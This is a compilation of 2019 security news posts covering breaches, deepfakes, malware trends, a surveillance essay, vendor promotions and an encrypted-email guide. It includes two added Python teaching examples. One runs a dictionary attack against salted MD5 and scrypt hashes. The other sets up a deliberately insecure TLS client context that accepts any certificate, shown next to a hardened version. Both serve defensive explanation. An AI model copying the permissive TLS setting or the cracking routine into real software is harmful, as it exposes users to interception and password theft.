The post Mozilla addressed flaws in Thunderbird that allow code execution appeared first on Security Affairs.

Evite Experiences Data Breach

Online invitation service Evite notified users about a data breach of user data that included names, usernames, email addresses, passwords, and mailing addresses.

The company disclosed the breach following the release of the affected data on the dark web. A hacker claimed to have access to 10 million user accounts.

“We became aware of a data security incident involving potential unauthorized access to our systems in April 2019. We engaged one of the leading data security firms and launched a thorough investigation. The investigation potentially traced the incident to malicious activity starting on February 22, 2019. On May 14, 2019, we concluded that an unauthorized party had acquired an inactive data storage file associated with our user accounts,” the company announced on its website.

Evite assured users that social security numbers and financial information were not part of the data being sold. The company urged users to reset their passwords and to be on the lookout for suspicious activities.


The post Evite Experiences Data Breach appeared first on Adam Levin.

US Lawmakers Hear Testimony on Concerns of Deepfakes

Days after a video of a transformed Arnold Schwarzenegger went viral on YouTube, members of the US House Intelligence Committee heard testimony on Thursday, June 13, raising concerns about the threat of “deepfakes,” according to The Hill.

In his opening remarks, committee chairman Adam Schiff said, “Advances in AI and machine learning have led to the emergence of advanced digitally doctored media, so-called ‘deepfakes’ that allow malicious actors to foment chaos, division or crisis....Of great concern is that deepfakes could have the power to disrupt the democratic process, particularly the presidential race of 2020.”

Schiff noted that three years ago, lawmakers feared that falsified documents could be used to meddle in elections. “Three years later, we are on the cusp of a technological revolution that could enable even more sinister forms of deception.”

Of paramount concern is that foreign actors could use these deepfakes to spew misinformation through malicious campaigns intended to deceive the public or sway public opinion. Throughout the course of the more-than-two-hour hearing, the committee saw convincing examples of deepfakes and examples of synthetic pictures of people that don’t exist at all.

Former FBI special agent and senior fellow for Alliance for Securing Democracy at the German Marshall Fund Clint Watts was part of a four-person panel that testified before the lawmakers of the potential for foreign adversaries to craft synthetic media capabilities that could be used against the US.

“The falsification of audio and video allows manipulators to dupe audience members in highly convincing ways, provoking emotional responses that can lead to widespread mistrust,” Watts warned.

It’s not only lawmakers who are worried about the potential threat of deepfakes. In a June 13 blog post, Nieman Lab looked at the myriad ways deepfakes could be used to manipulate the outcome of an election, noting that “deepfakes have the potential to wreak havoc in contexts such as news, where audio and video are treated as a form of evidence that something actually happened.

“So-called 'cheapfakes,' such as the widely circulated clip of House Speaker Nancy Pelosi, have already demonstrated the potential for low-tech manipulated video to find a ready audience. The more advanced technology creates a whole new level of speed, scale, and potential for personalization of such disinformation.”

Malware a Serious Threat for Industrial Orgs

During Q1 2019, Cryptolocker malware spiked to account for 24% of all malware used, up from only 9% in Q4 2018, according to a new report from Positive Technologies.

“This malware is often used in combination with phishing, with hackers constantly inventing new ways of deceiving users and making them pay a ransom. Healthcare has proved to be a favorite target of cryptolockers. Medical institutions are more likely to pay a ransom compared to other businesses, perhaps because of patients' lives and health being at stake,” the report stated.

“Phishing remains an effective way of delivering malware. But email is far from the only channel of malware distribution. For example, users frequently download files from torrent trackers, on which the risk of malware infection grows exponentially. Under the guise of a movie, attackers distributed malware used for spoofing addresses of bitcoin and Ethereum wallets when the information is copied from the clipboard. Users also often download programs from official app stores.”

Also up during Q1 was the number of unique threats, which exceeded the numbers from Q1 of last year by 11%. The report noted an increasing number of cases of infection using multifunctional Trojans, with attackers most often hitting government agencies (16%), medical institutions (10%) and industrial companies (10%).

“Malware combining multiple types of Trojans is becoming more and more widespread. Due to its flexible modular architecture, this malware can perform many different functions. For example, it can display advertising and steal user data at the same time,” the report said.

While Cryptolocker malware has risen, the percentage of hidden mining has decreased to 7% from the previously reported 9% in Q4 2018.

“Hackers have started to upgrade miners, turning them into multifunctional Trojans. Once inside a system with low computational power on which mining is uneconomical, such Trojans start acting as spyware and steal data,” the report said. According to the research, cyber-criminals are using self-developed spyware or hacking government websites to steal data from governments.

Computers and Video Surveillance

It used to be that surveillance cameras were passive. Maybe they just recorded, and no one looked at the video unless they needed to. Maybe a bored guard watched a dozen different screens, scanning for something interesting. In either case, the video was only stored for a few days because storage was expensive.

Increasingly, none of that is true. Recent developments in video analytics -- fueled by artificial intelligence techniques like machine learning -- enable computers to watch and understand surveillance videos with human-like discernment. Identification technologies make it easier to automatically figure out who is in the videos. And finally, the cameras themselves have become cheaper, more ubiquitous, and much better; cameras mounted on drones can effectively watch an entire city. Computers can watch all the video without human issues like distraction, fatigue, training, or needing to be paid. The result is a level of surveillance that was impossible just a few years ago.

An ACLU report published Thursday called "the Dawn of Robot Surveillance" says AI-aided video surveillance "won't just record us, but will also make judgments about us based on their understanding of our actions, emotions, skin color, clothing, voice, and more. These automated 'video analytics' technologies threaten to fundamentally change the nature of surveillance."

Let's take the technologies one at a time. First: video analytics. Computers are getting better at recognizing what's going on in a video. Detecting when a person or vehicle enters a forbidden area is easy. Modern systems can alarm when someone is walking in the wrong direction -- going in through an exit-only corridor, for example. They can count people or cars. They can detect when luggage is left unattended, or when previously unattended luggage is picked up and removed. They can detect when someone is loitering in an area, is lying down, or is running. Increasingly, they can detect particular actions by people. Amazon's cashier-less stores rely on video analytics to figure out when someone picks an item off a shelf and doesn't put it back.

More than identifying actions, video analytics allow computers to understand what's going on in a video: They can flag people based on their clothing or behavior, identify people's emotions through body language and behavior, and find people who are acting "unusual" based on everyone else around them. Those same Amazon in-store cameras can analyze customer sentiment. Other systems can describe what's happening in a video scene.

Computers can also identify people. AIs are getting better at identifying people in those videos. Facial recognition technology is improving all the time, made easier by the enormous stockpile of tagged photographs we give to Facebook and other social media sites, and the photos governments collect in the process of issuing ID cards and drivers licenses. The technology already exists to automatically identify everyone a camera "sees" in real time. Even without video identification, we can be identified by the unique information continuously broadcasted by the smartphones we carry with us everywhere, or by our laptops or Bluetooth-connected devices. Police have been tracking phones for years, and this practice can now be combined with video analytics.

Once a monitoring system identifies people, their data can be combined with other data, either collected or purchased: from cell phone records, GPS surveillance history, purchasing data, and so on. Social media companies like Facebook have spent years learning about our personalities and beliefs by what we post, comment on, and "like." This is "data inference," and when combined with video it offers a powerful window into people's behaviors and motivations.

Camera resolution is also improving. Gigapixel cameras are so good that they can capture individual faces and identify license plates in photos taken miles away. "Wide-area surveillance" cameras can be mounted on airplanes and drones, and can operate continuously. On the ground, cameras can be hidden in street lights and other regular objects. In space, satellite cameras have also dramatically improved.

Data storage has become incredibly cheap, and cloud storage makes it all so easy. Video data can easily be saved for years, allowing computers to conduct all of this surveillance backwards in time.

In democratic countries, such surveillance is marketed as crime prevention -- or counterterrorism. In countries like China, it is blatantly used to suppress political activity and for social control. In all instances, it's being implemented without a lot of public debate by law-enforcement agencies and by corporations in public spaces they control.

This is bad, because ubiquitous surveillance will drastically change our relationship to society. We've never lived in this sort of world, even those of us who have lived through previous totalitarian regimes. The effects will be felt in many different areas. False positives -- when the surveillance system gets it wrong -- will lead to harassment and worse. Discrimination will become automated. Those who fall outside norms will be marginalized. And most importantly, the inability to live anonymously will have an enormous chilling effect on speech and behavior, which in turn will hobble society's ability to experiment and change. A recent ACLU report discusses these harms in more depth. While it's possible that some of this surveillance is worth the trade-offs, we as a society need to deliberately and intelligently make decisions about it.

Some jurisdictions are starting to notice. Last month, San Francisco became the first city to ban facial recognition technology by police and other government agencies. A similar ban is being considered in Somerville, MA, and Oakland, CA. These are exceptions, and limited to the more liberal areas of the country.

We often believe that technological change is inevitable, and that there's nothing we can do to stop it -- or even to steer it. That's simply not true. We're led to believe this because we don't often see it, understand it, or have a say in how or when it is deployed. The problem is that technologies of cameras, resolution, machine learning, and artificial intelligence are complex and specialized.

Laws like what was just passed in San Francisco won't stop the development of these technologies, but they're not intended to. They're intended as pauses, so our policy making can catch up with technology. As a general rule, the US government tends to ignore technologies as they're being developed and deployed, so as not to stifle innovation. But as the rate of technological change increases, so do the unanticipated effects on our lives. Just as we've been surprised by the threats to democracy caused by surveillance capitalism, AI-enabled video surveillance will have similar surprising effects. Maybe a pause in our headlong deployment of these technologies will allow us the time to discuss what kind of society we want to live in, and then enact rules to bring that kind of society about.

This essay previously appeared on Vice Motherboard.

Threat Roundup for June 7 to June 14

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between May 31 and June 7. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, or


TRU06142019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for June 7 to June 14 appeared first on Cisco Blog.

Top Security and Risk Management Trends Unveiled at Gartner Security and Risk Management Summit 2019

Standing on the shores of the Potomac, the Gaylord National Resort and Convention Center at National Harbor is gearing up to host the 2019 Gartner Security and Risk Management Summit, June 17-20. Now in its 24th year, this event is the premier gathering of security, risk management and business continuity management leaders.

In the Digital Age, IT security is everyone’s business and Cisco is looking forward to continuing our tradition of being a Premier sponsor and sharing the latest innovations to improve your security posture and mitigate risk.

Whether you are a CISO looking to network with peers and improve your leadership skills or a security professional looking for practical advice – Cisco has you covered.



Private Meetings

Want to talk strategy? Cisco executives and subject matter experts will be available for private meetings. Please get in contact to schedule a meeting.

Discount Code

Use priority code SECSP25 and receive $350 off your conference registration.

Cisco Booth 409

Will feature giveaways and demos including:


  • Endpoint Security
  • Advanced Malware Protection (AMP) and Cisco Threat Response
  • Secure Internet Gateway and SD-WAN
  • Cisco Umbrella, Cisco Cloudlock and Cisco Web Security Appliance (WSA)
  • Zero Trust
  • Duo Security, Now Part of Cisco
  • Network and Cloud Security Analytics
  • Stealthwatch
  • NGFW and NGIPS
  • Firepower and Cisco Defense Orchestrator
  • Workload Protection
  • Application and Workload Security


Networking Welcome Reception

Monday, June 17, 2019 | 5:45 p.m. – 7:30 p.m.

Location: Exhibit Showcase

Join us in the Exhibit Showcase for a special circus-themed reception where you can engage with your peers, Gartner analysts, and exhibitors while enjoying delicious food and beverages, fun games, raffle drawings, and lively entertainment. Also, don’t miss a chance to get a sneak peek at the motorcycle we’ll be raffling off on Wednesday.

Hospitality Suite: Cisco Hog Wild

Wednesday, 5:45 p.m., National Harbor 5

All attendees are invited to cruise over for a night of blues, beer, BBQ, and a chance to win a 2019 Harley-Davidson Softail Street Bob motorcycle!

Cisco Sessions

SPS13: The Tectonic Shift in Security

By: Gee Rittenhouse, Jeff Reed

Monday, June 17, 2019, 3:15–4 p.m. | Potomac C

Securing today’s modern work environment is increasingly complicated. As technology shifted to lean into the digital business transformation, a new architecture built for a multicloud environment was required. Cisco will discuss the multi-domain architecture needed to securely connect every user, on every device, on every network, to every application.


TH5: Threat Research – Fighting the Good Fight

By: Joel Esler

Monday, June 17, 2019, 1:15–1:40 p.m. | Theater 1, Exhibit Showcase, Prince George’s Hall D

Exploitable vulnerabilities exist. It’s a fact of life in the modern work environment. Attackers are achieving greater ROI with every attack. The counterpunch is threat intelligence. Cisco will discuss the future of threat, the evolving threat landscape and the inescapable need for automated threat intelligence as part of your security architecture.


ETSS3: Building Zero Trust Security Solutions

By: Wendy Nather, Ash Devata

Monday, June 17, 2019, 11:30 a.m.-12 p.m. | Chesapeake 3

Call it “zero trust” or “an initial step on the road to CARTA” – we know the classic design patterns of security have to change. In this session, we’ll talk about different ways to build on the fundamentals of “zero trust,” working together with partners in stages to create better and more usable security.


ETSS15: Future of the Firewall

By: Bret Hartman, Houda Soubra

Tuesday, June 18, 2019, 10:45–11:15 a.m. | Chesapeake 5

The digital transformation underway in many organizations poses an increasing challenge to security operations. Secure your hybrid environments of edge, end point and cloud with a single orchestrator solution to: Streamline policy design and enforcement; automate administrative tasks; improve accuracy; and reduce deployment time.


ETSS17: Designing Security for the Future of Your Network

By: Meg Diaz

Tuesday, June 18, 2019, 3:30–4 p.m. | Chesapeake 2

With the explosion of cloud apps, the move to highly distributed environments (SD-WAN, anyone?), and an increase in mobile workers, the threat landscape isn’t standing still. Learn more about what your peers are experiencing, a new approach to secure roaming users/branch locations, and how Cisco is evolving security to address these challenges in innovative ways.


ETSS23: Workload Security and Visibility

By: Vaishali Ghiya

Wednesday, June 19, 2019, 10:45–11:15 a.m. | Chesapeake 3

Technologies like virtualization and SDN are rapidly rolling out new applications and services. Modern applications no longer reside just within a company’s physical data center but also deploy across a multicloud environment. Learn how to 1) protect workloads and 2) deliver a zero-trust security approach with deep visibility and multi-layered segmentation.

View the full agenda here. Don’t forget to download the conference app so that you don’t miss a beat!


Follow us and join the conversation on Twitter, Facebook and LinkedIn.

See you there!

The post Top Security and Risk Management Trends Unveiled at Gartner Security and Risk Management Summit 2019 appeared first on Cisco Blog.

Canadian City Fell Prey to a $375K Phish

Yet another city has fallen victim to what it describes as "a complex phishing email." The scam cost Burlington, Ontario, Canada, C$503,000, the equivalent of nearly US$375,000.

“On Thursday, May 23, the City of Burlington discovered it was a victim of fraud. A single transaction was made to a falsified bank account as a result of a complex phishing email to City staff requesting to change banking information for an established City vendor. The transaction was in the form of an electronic transfer of funds made to the vendor...and was processed on May 16," the city announced.

Burlington immediately contacted law enforcement and a criminal investigation is underway, according to the announcement.

“Cyber-attacks are on the rise, and phishing emails that involve the human factor are responsible for a great number of these breaches. Organizations globally are realizing the need to invest in employee training and deploy different training solutions in hope to mitigate the risk of data breaches,” said Shlomi Gian, CEO at CybeReady.

“Instead of increasing spending and IT effort, organizations should opt for smart solutions that guarantee change in employee behavior. Effective training should not become an IT and financial burden. Increased awareness might be the only way to reduce the risk of another incident like this in the foreseeable future.”

According to Global News Canada, none of Burlington’s systems have been impacted by the transaction. At this time, the city is not providing any additional information, but experts advise that all organizations continue to invest in their human capital via security training and awareness.

“Humans remain the weakest link in any organization. Properly implemented security controls can reduce the risk of human error but not eliminate it. Worse, cyber-criminals will now purposely target smaller organizations that cannot afford to invest in their cybersecurity,” said Ilia Kolochenko, founder and CEO of web security company ImmuniWeb.

Cyber News Rundown: Radiohead Hit by Ransomware Hack

Reading Time: ~ 2 min.

Radiohead Refuses Ransom, Releases Stolen Tracks

The band Radiohead recently fell victim to a hack in which 18 hours of previously unreleased sessions were ransomed for $150,000. Rather than pay the ludicrous fee, the band instead opted to release the tracks through Bandcamp for a donation to charity. The unreleased sessions were stored as archived mini discs the band created during the years surrounding their third album, “OK Computer.”

US Border Protection Breached by Contractor

A subcontractor for the US Customs and Border Protection (CBP) agency is under scrutiny after it was revealed that they had illicitly transferred thousands of images of both license plates and travelers that had crossed the US/Mexico border in the last month. In doing so, the subcontractor broke several mandatory security policies written into a legal contract. While there is no sign of the images leaking onto the dark web, there is very little redress for the exposed travelers without proving actual harm.

Billions of Spam Emails Sent Everyday

The latest industry report on spam emails revealed that around 3.4 billion fake/spam emails are distributed across the globe each day. More worrisome is that the majority of these emails originate in the US and regularly target US-based industries. While many industries have improved security measures, larger enterprises have struggled to implement strong protection for their entire staff.

Ransomware Hits Washington Food Bank

The Auburn Food Bank in the State of Washington recently fell victim to a ransomware attack that encrypted all but one of their computers, which was isolated from the internal network. Instead of paying the ransom, the nonprofit chose to wipe all computers, including their email server, and begin rebuilding from scratch. The ransomware variant has been claimed to be GlobeImposter 2.0, which requires the victim to contact the attacker to determine the ransom demanded.

Retro Game Site Breached

Account information for over 1 million users of EmuParadise, a retro gaming site that hosts all things gaming related, was leaked. The breach, which took place in April of 2018, affected 1.1 million IP and email addresses, many of which had already appeared in previous data breaches. It is still unclear how the breach actually took place, though given the use of salted MD5 hashes for storing user passwords, it’s clear EmuParadise could have done more to properly secure its users’ information: a salt defeats precomputed tables, but MD5 is fast enough that an attacker can still test an enormous number of candidate passwords per second against each leaked hash.
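To make the point concrete, here is an added example (not code from Webroot or EmuParadise) that stores one constructed user's password under salted MD5 and under scrypt, then runs the same small dictionary attack against both rows and measures the cost of a single guess under each scheme. The scrypt parameters and the wordlist are assumptions chosen so the script runs in a second or so.

```python
"""Salted MD5 next to scrypt: why EmuParadise's choice was not enough.

Added example for the breach item above; it is not code from Webroot or
EmuParadise. Users, salts and the wordlist are constructed test data, and the
scrypt cost parameters are an assumption (tune them upward in production).
"""
import hashlib
import hmac
import os
import time

# --- Scheme 1: salted MD5 (what the breach write-up describes) --------------
# The salt defeats precomputed (rainbow) tables, but MD5 is so cheap that an
# attacker can still try millions of candidates per second per hash.

def md5_hash(password: str, salt: bytes) -> str:
    return hashlib.md5(salt + password.encode()).hexdigest()

def md5_verify(password: str, salt: bytes, stored: str) -> bool:
    return hmac.compare_digest(md5_hash(password, salt), stored)

# --- Scheme 2: scrypt (memory-hard KDF, in hashlib since Python 3.6) --------
# Same salt idea, but every guess now costs ~16 MiB of RAM and tens of
# milliseconds; that per-guess cost is what actually slows an offline attack.

SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1   # assumed cost parameters

def scrypt_hash(password: str, salt: bytes) -> str:
    return hashlib.scrypt(password.encode(), salt=salt,
                          n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32).hex()

def scrypt_verify(password: str, salt: bytes, stored: str) -> bool:
    return hmac.compare_digest(scrypt_hash(password, salt), stored)

# --- An offline attacker's view of one leaked (salt, hash) row --------------

def dictionary_attack(verify, salt: bytes, stored: str, wordlist):
    """Try each candidate in order; return (recovered_password, guesses_made)."""
    for n, guess in enumerate(wordlist, 1):
        if verify(guess, salt, stored):
            return guess, n
    return None, len(wordlist)

def seconds_per_guess(hash_fn, salt: bytes, rounds: int = 10) -> float:
    t0 = time.perf_counter()
    for _ in range(rounds):
        hash_fn("not-the-password", salt)
    return (time.perf_counter() - t0) / rounds

# Constructed wordlist; the victim's password is the fourth entry.
WORDLIST = ["123456", "password", "qwerty", "dragon123", "letmein"]

def compare_schemes(user_password: str = "dragon123") -> dict:
    """Register one user under both schemes, then crack both stored rows."""
    salt = os.urandom(16)
    md5_row = md5_hash(user_password, salt)
    scrypt_row = scrypt_hash(user_password, salt)
    md5_found, md5_n = dictionary_attack(md5_verify, salt, md5_row, WORDLIST)
    sc_found, sc_n = dictionary_attack(scrypt_verify, salt, scrypt_row, WORDLIST)
    md5_cost = max(seconds_per_guess(md5_hash, salt), 1e-9)
    sc_cost = seconds_per_guess(scrypt_hash, salt)
    return {
        "md5_recovered": md5_found, "md5_guesses": md5_n,
        "scrypt_recovered": sc_found, "scrypt_guesses": sc_n,
        # How many times more expensive a single guess is under scrypt.
        "slowdown_factor": sc_cost / md5_cost,
    }

if __name__ == "__main__":
    r = compare_schemes()
    print(f"salted MD5: cracked {r['md5_recovered']!r} in {r['md5_guesses']} guesses")
    print(f"scrypt    : cracked {r['scrypt_recovered']!r} in {r['scrypt_guesses']} guesses")
    print(f"but each scrypt guess cost ~{r['slowdown_factor']:.0f}x more than an MD5 guess")
```

Both rows fall to the same five-word list, because salting only stops precomputation and a weak password is weak under any hash. The difference is the slowdown factor: multiplied across 1.1 million leaked hashes and a real wordlist, it is the line between a userbase cracked in hours and one that stays largely intact.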

The post Cyber News Rundown: Radiohead Hit by Ransomware Hack appeared first on Webroot Blog.

The Best Encrypted Email Services You Need to Use in 2019

You may be concerned that everything you do online is being watched by the government, powerful corporations, or malicious hackers.  

One way to defend yourself against unwanted eyes is encryption.

In the past, we’ve shared with you what encrypted messaging apps you should use for secure communication and also walked you through the most popular free encryption software tools.

We can all agree on the fact that a huge part of our internet activity revolves around email.  

In this article, then, I’m going to offer you some alternatives to popular email services such as Gmail or Yahoo. Those can also be secured to a certain degree, but the mainstream providers are notorious for mishandling their users’ data or scanning inboxes for keywords to display personalized ads.

I’m sure you want everything you share via email to stay private and be accessible only to the people you choose, and the way to do this is through encrypted email.

Although there are multiple ways to secure your email with encryption software, they are often difficult for non-technical users to set up. I may dig into that subject later if you are interested, but for now I’m going to look at some encrypted email services that are easy to use.

So, below I’ve put together a list of user-friendly web-based encrypted email services that will help you increase your level of online privacy.

You’ll notice that (almost) all of the options come from European countries. Here, the GDPR imposes strict rules on data privacy, and among many other regulations, it’s making privacy by design a legal requirement.  

Disclaimer: While none of those providers will share your data with other companies/advertisers, some may present it to government entities under legal demands.

1. ProtonMail

ProtonMail is an encrypted email service based in Switzerland and created by scientists, engineers, and developers from CERN, with the intention of increasing your online security and privacy. They pride themselves on datacenters “located under 1000 meters of granite rock in a heavily guarded bunker which can survive a nuclear attack”.


  • Free option with 500MB storage and 150 emails per day
  • Paid options starting from $ 4.00 / Month for personal use
  • Business plans for $6.25 / Month / User
  • Two-step verification
  • Use your own domain
  • Mobile apps available (iOS and Android)
  • Report phishing option
  • Self-destructing messages – you can set an expiration time on your emails so they get automatically deleted from the recipient’s inbox after a certain time
  • Based on open source code
  • They use AES, RSA, and OpenPGP encryption

2. Tutanota  

Tutanota is an encrypted email provider from Germany. They position themselves as a secure alternative to Gmail. According to their website, they are also planning to include a calendar, notes, and cloud storage in their offering – and of course, all of these features will be encrypted too.  


  • Free for 1 user with 1GB of storage
  • Other paid options starting from €12 for personal use  
  • Business plans available
  • Free for non-profit organizations
  • Use your own domain
  • Two-factor authentication
  • Based on open-source code
  • Their data centers run on 100% renewable energy

Additional details:

If you want to send an email to someone who’s using a different email service (for instance, Gmail), you will be asked to enter a password that you will have to share with the recipient.  

The recipient will then use it to unlock your message and read it by accessing a link. The URL will remain active until you send them another confidential email.

This is what an email sent from a Tutanota account to someone who is using a different email service looks like.  

3. Hushmail

Hushmail is a secure email service based in Canada that encrypts your email communication. Simplicity is at the core of their business in order to keep their customers secure and better understand potential threats. Hushmail uses the “passphrase” naming for the log-in field which is typically referred to as “password”, in this way encouraging people to use more complex passwords – phrases, rather than words.


  • 14-Day free trial (no credit card required), then $49.98 per year with 10GB of email storage
  • Business plans available
  • iOS app
  • Two-factor authentication
  • Use your own domain
  • An account will be locked if too many attempts are made to access it
  • Ability to set up Hushmail within an email program (Mac Mail, Microsoft Outlook, Android phone, Thunderbird)
  • Inbox antivirus and spam filtering
  • TLS/SSL, OpenPGP encryption

Additional details:

Similar to Tutanota, if your recipient is not using Hushmail, you have to check the Encrypted checkbox, and the email will be read on a secure web page.

4. Countermail

Countermail is a web-based encrypted email provider, with their data centers located in Sweden. Although their website looks quite outdated, their email security is able to handle today’s privacy threats.  


  • 7-day free trial. After the trial ends, multiple plans are available starting with $4.83 per month with 4000MB of storage. You also have the possibility to add extra storage for a fee.
  • Compatible with Android phone
  • Message filter / Auto reply
  • Supports IMAP
  • Diskless web servers – they have no hard drives and boot from a CD-ROM, so nothing from a session persists on the server. Their web server does not log any IP addresses.
  • USB-key option – It’s used as a keyfile in combination with your password for increased security. It provides better protection against keyloggers and brute force attacks.  
  • OpenPGP data encryption, SSL-MITM protection

5. Runbox

Headquartered in Norway, Runbox is a company that provides secure email services worldwide, offering encrypted communication and strong authentication.


  • Free 30-Day Trial
  • Paid plans for personal use, starting with EUR 14.95 per year, with 1 GB for email and 100 MB for files
  • Business plans starting with EUR 69.95 per year, with 25 GB for email, 2 GB for files, and 25 email domains
  • Accepted payment methods: Credit/debit cards, Bitcoin, PayPal, Money Orders, SWIFT/SEPA payments, and cash.
  • 60-day full money back guarantee
  • Use your own domain
  • Calendar
  • Ad-free Webmail, spam and virus filtering, email consolidation, and filtering
  • Access from any client via POP, IMAP, SMTP, and others
  • End-to-end encryption
  • Their servers run on 100% renewable energy

6. Kolab Now

Kolab Now offers email accounts for secure collaboration, with all the strongly protected data being stored in Switzerland. Just like any other secure encrypted email service, they will never monitor your data, sell it to third parties, or display ads.  




  • 30-Day Free Trial, then prices start at $4.44 per month for an Individual account
  • Group accounts (1 to 100 users) from $5.42 per month
  • Calendar, address book, files, and more
  • Two-factor authentication (this will disable access to your account on any other channel, such as ActiveSync, *DAV and IMAP)
  • Mobile synchronization (enabled for mobile devices using ActiveSync)
  • Automatic replies

7. Mailfence

Mailfence was founded in Belgium on the principle that privacy is a right and not a feature. They focus on transparency and maintain an updated transparency report, also keeping their code open to audits.  



  • Free version for 1 group with 500MB of email, 500MB of documents, a 1,000-event calendar, and support via email
  • Paid versions starting from EUR 2.50 per month with 5GB of email, 12GB of documents, a 10,000-event calendar, and support via email and phone
  • Business plans available, tailored to your company’s needs
  • POPS, IMAPS, SMTPS, iOS, Android, Exchange
  • Custom email domain
  • Contacts, Calendar, Documents, and Groups
  • Accepted payment methods: credit card, PayPal, Bitcoin, Litecoin
  • Two-factor authentication
  • End-to-end encryption

8. Posteo

Posteo is an independent email service based in Germany focused on sustainability, security, privacy, and usability. The service is fully ad-free and they protect their users’ privacy through an innovative encryption and security model.



  • Pricing starting with 1 EUR per month with 2GB storage – two aliases included. Storage can be increased up to max. 20 GB, each additional GB costs 0.25 EUR/month;
  • Migration service from other email accounts available (folder structure included)
  • Automatic replies
  • Anonymous signup – you don’t have to provide your name or address during registration
  • Anonymous payment – they don’t link payments with email accounts
  • Calendar  
  • 100% open-source code
  • Spam and virus filter
  • Emails sent don’t contain your IP address
  • Free support
  • Two-factor authentication
  • Accepted payments: PayPal, bank transfer, credit card or cash
  • TLS-encrypted access – TLS with PFS for IMAP, POP3, webmail, CardDAV, and CalDAV
  • TLS-encrypted transmission: protects emails and metadata, as long as the other email server also supports it (TLS with PFS).
  • TLS-sending guarantee - protects you from sending emails to insecure systems
  • AES encrypted hard disks  
  • Runs on 100% renewable energy

9. StartMail

StartMail is based in The Netherlands and was built by the creators of StartPage, a private search engine. This is a great platform for secure communications, that can be accessed from a webmail interface, as well as through IMAP protocol, which makes it compatible with existing email clients.


  • Free 7-Day trial (no credit card required)
  • Accounts for personal use with $59.95 per year – 10 GB storage, 10 custom aliases, unlimited disposable aliases, IMAP support
  • Business accounts at $59.95 per mailbox per year – 10 GB storage, custom and disposable aliases, IMAP support
  • Disposable email addresses – create temporary email addresses when you don’t want to share the real ones
  • IMAP/SMTP compatible
  • It’s based on a mix of open-source and closed-source components
  • PGP encryption, TLS 1.1 and 1.2 with PFS (TLS 1.1 has since been deprecated; prefer a client that negotiates 1.2 or later), and extra-secure vaults
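Several of the providers above advertise the server side of the transport picture: TLS with perfect forward secrecy (Posteo), TLS 1.2 with PFS (StartMail), protection against MITM (Countermail). The client side is yours to get right. The following is an added example, not code from any of these providers or from Heimdal, that builds a permissive client TLS context next to a hardened one for IMAP and audits each against those properties. Host names are placeholders and nothing connects unless you call connect_imap() yourself.

```python
"""Two client TLS policies for an encrypted mail provider, and an audit of each.

Added example; not code from Posteo, StartMail, Countermail or Heimdal.
The host name is a placeholder; connect_imap() is the only thing that
touches the network, and it is never called automatically.
"""
import imaplib
import ssl
from typing import List, Optional

# Forward secrecy comes from ephemeral (EC)DH key exchange. Every TLS 1.3
# suite (OpenSSL names starting "TLS_") has it; for TLS 1.2 we must ask.
PFS_CIPHERS = "ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:!aNULL:!eNULL:!MD5:!RC4"

def permissive_context() -> ssl.SSLContext:
    """The weak setting: the link is encrypted, but any certificate is
    accepted, so an active attacker on the path can impersonate the server."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx

def hardened_context(cafile: Optional[str] = None) -> ssl.SSLContext:
    """The corrected setting: validate chain and host name, refuse anything
    below TLS 1.2, disable TLS compression, and allow only PFS suites."""
    ctx = ssl.create_default_context(cafile=cafile)   # CERT_REQUIRED + hostname
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.options |= ssl.OP_NO_COMPRESSION
    ctx.set_ciphers(PFS_CIPHERS)
    return ctx

def audit_context(ctx: ssl.SSLContext) -> List[str]:
    """Return policy violations; an empty list means the client will only
    talk to a verified server over TLS 1.2+ with a forward-secret suite."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("peer certificate is not verified (MITM possible)")
    if not ctx.check_hostname:
        findings.append("host name is not checked against the certificate")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("accepts TLS below 1.2; TLS 1.0 and 1.1 are deprecated")
    if not ctx.options & ssl.OP_NO_COMPRESSION:
        findings.append("TLS compression enabled")
    # Anything that is not (EC)DHE or a TLS 1.3 suite uses static RSA key
    # exchange: a later key compromise decrypts every recorded session.
    non_pfs = [c["name"] for c in ctx.get_ciphers()
               if not c["name"].startswith(("ECDHE", "DHE", "TLS_"))]
    if non_pfs:
        findings.append(f"non-forward-secret suites enabled: {non_pfs[:3]}")
    return findings

def connect_imap(host: str = "imap.example.invalid",
                 ctx: Optional[ssl.SSLContext] = None) -> imaplib.IMAP4_SSL:
    """Open IMAPS (port 993) under the hardened policy. A server that cannot
    meet it causes an ssl.SSLError instead of a silent downgrade."""
    return imaplib.IMAP4_SSL(host, 993, ssl_context=ctx or hardened_context())

if __name__ == "__main__":
    for name, ctx in (("permissive", permissive_context()),
                      ("hardened", hardened_context())):
        print(name, audit_context(ctx) or "OK")
```

Run the audit against whatever context your mail client or script actually uses; the common failure in the wild is the first finding, a library or tool that sets CERT_NONE "to make it work", which turns the provider's MITM guarantees into a formality.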

10. Mailbox

Mailbox is a secure email provider based in Germany, which was founded with the purpose of becoming an alternative to other webmail services that depend on their customer data to obtain revenue from advertising. All created accounts include other features besides an email inbox, such as a cloud office suite to edit documents, a calendar, etc.


  • Free 30-Day Trial, with 10 emails per day, storage space of 100MB for emails, 10MB file storage, 1 email address alias
  • Paid option for personal use starting with 1 EUR per month, with 2GB email storage, 3 email aliases
  • Business email plan starting with 25 EUR per month, with central management console, email and groupware, cloud storage, online word processing, and more
  • Calendar, Contacts, Task Planner
  • Online Office
  • Cloud Storage
  • Offline mode  
